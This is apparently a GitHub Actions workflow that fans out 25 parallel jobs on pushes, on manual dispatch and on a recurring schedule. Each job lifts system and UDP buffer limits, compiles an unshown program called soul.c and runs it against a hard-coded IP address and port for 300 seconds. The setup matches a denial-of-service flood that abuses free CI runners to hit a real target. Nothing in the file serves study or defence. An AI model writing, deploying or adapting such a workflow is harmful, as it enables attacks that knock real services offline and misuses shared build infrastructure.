name: soul
on:
  push:
  pull_request:
  schedule:
    - cron: '0 */7 * * *'
  workflow_dispatch:

jobs:
  build_and_run:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        job: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 
              11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 
              21, 22, 23, 24, 25]

    steps:
    - name: Checkout code
      uses: actions/checkout@v3

    - name: Increase system UDP/Memory limits
      run: |
        ulimit -f unlimited
        ulimit -v unlimited
        ulimit -s unlimited
        sudo sysctl -w net.core.rmem_max=26214400
        sudo sysctl -w net.core.wmem_max=26214400

    - name: Install build tools
      run: sudo apt-get update && sudo apt-get install -y build-essential

    - name: Compile soul.c
      run: g++ -std=c++17 -O2 -pthread soul.c -o soul

    - name: Run soul
      run: ./soul 20.204.19.255 11009 300
